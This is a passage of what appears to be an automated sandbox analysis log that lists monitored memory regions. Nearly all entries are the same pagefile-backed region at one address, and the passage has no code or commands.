pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2929 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2930 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2931 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2933 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2934 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2935 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2939 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2940 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2941 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2944 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2945 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2946 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2947 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2954 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2955 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 2956 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2961 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2969 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2970 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 2999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3043 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3044 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3049 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3050 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3051 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3053 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3054 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3055 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3056 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3057 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3058 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3059 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3060 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3061 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3062 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3063 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3064 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3065 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 3066 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3067 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3068 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3069 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3070 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3071 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3072 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3076 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3077 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3087 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3088 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3089 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3090 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3091 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3092 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3093 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3094 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3095 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3096 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3097 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3098 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3099 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3100 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3101 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3102 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3103 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3104 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3105 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3106 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3107 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3111 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3114 start_va = 0x2880000 end_va = 0x288efff monitored = 1 